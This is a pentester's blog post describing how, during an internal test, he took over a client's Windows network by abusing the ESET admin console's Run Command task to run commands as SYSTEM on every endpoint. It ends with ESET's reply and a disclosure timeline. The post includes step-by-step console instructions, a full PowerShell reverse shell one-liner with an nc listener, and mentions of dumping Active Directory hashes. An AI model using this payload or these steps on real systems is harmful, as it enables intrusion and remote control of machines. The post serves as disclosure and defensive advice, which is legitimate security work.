How I Hacked Into Your Corporate Network Using Your Own Antivirus Agent
by Angelo Ruwantha
Recently I was busy with one of my client project, which is a fully penetration testing assignment against his company after the external pentest, I’ve moved into internal pentest. The company itself has Microsoft windows environment with active directory configured and they have been using eset endpoint as their antivirus. After few hours, I was able to break into one of the server using very popular exploit ms17-***.
After few, minutes I found clear text passwords which they had saved in a web browser and I managed to decrypt all the passwords and moved into lateral movements. Then, I found ESET admin console passwords are along with them, so I logged into admin console and I saw most of the computers are connected to the ESET endpoint.
So I came up with this amazing idea, which is what if I can perform RCE against every connected device so iIcan get a shell from each of them. So I did some research and I found that ESET has a feature called Run Command Task[1], According to ESET documentation, it's mentioned that Run Command task can be used to execute specific command line instructions on the client and most important thing is that it executes the commands with NT AUTHORITY\SYSTEM Privilege. So after I found this, I was able to get into active directory servers and dumped the hashes and compromised entire network.
Then I reported about this issue to ESET security team and I got this reply from ESET Security Team: "We do not consider this as vulnerability — it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple — BAT script is created with user defined content and launched.
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network."
According to ESET security team looks like they don’t care about this issue very much, well but I have to say the impact is huge. If an attacker able to recovered the password of ERA server it’s gives full privilege to an attacker over the network, and finally to the sys admins never store your password plain text or in a web browser. Always make sure to use secure password store mechanisms.
POC
- Go to https://server_ip/era/webconsole/#id=CLIENTS
- Right click on any connected devices, that you want to do the RCE
- Click New Task, and fill up the basic info, such as task name and select Task to Run command, and then select settings tab and type the command you want to execute. Then, click Finish.
4.Then again select your target and click Run Task, and select your previous defined task, then select Trigger tab and make sure set trigger type: "As soon as possible". Then, click Finish.
5.Game over !
PowerShell Reverse Shell Payload[2]
-
powershell –nop –exec bypass –c “$client = New-Object System.Net.Sockets.TCPClient(”,443);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535 %%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendb yte,0,$sendbyte.Length);$stream.Flush()};$client.Close()“
- nc -lvp 443
Timeline:
Oct 10,2018: Initial discover
Jan 10,2019: Report submitted to [email protected]
Jan 14,2019:Requested an update on the case
Jan 23,2019:Requested an update on the case
Apr 11,2019:Another report submitted to [email protected] with POC and write up
Apr 22,2019:Requested an update on the case
May 5,2019: Requested more information and details on case
May 6,2019: found out its a feature of ESET AV
Reply from ESET Security Team: "We do not consider this as vulnerability — it should allow clients to launch commands, done in context of AGENT as LOCAL_SYSTEM. From practical point of view it allows full administration of machine assigned to ERA/ESMC server. Task is simple — BAT script is created with user defined content and launched.
Security of ERA/ESMC environment is based on access to ERA/ESMC server. Once attacker get access to ERA/ESMC, he have access to whole network."
June 10,2019:Released POC to public
June 11,2019: Released Blog post
References
[1] https://help.eset.com/esmc_admin/70/en-US/client_tasks_run_command.html
[2] https://gist.github.com/ohpe/bdd9d4385f8e6df26c02448f1bcc7a25
About the Author
Angelo Ruwantha is currently working as a pentester in KPMG Sri Lanka. His interests are breaking and building stuff.
The article has been originally published at: https://medium.com/@ruwanthawin32/this-is-how-i-hacked-into-your-corporate-network-using-your-own-anti-virus-agent-1f891a890063
Author
Latest Articles
- BlogDecember 28, 2022Cybersecurity in Education: What Parents, Teachers, and Students Should Know in 2023
- BlogDecember 15, 2022Remembering Leonard Jacobs
- BlogSeptember 30, 2022VPN Security: A Pentester's Guide to VPN Vulnerabilities
- BlogAugust 9, 2022AppSec Tales II | Sign-in
Are you serious?
Nothing todo with pentests. Maybe employed by Kaspersky ? :D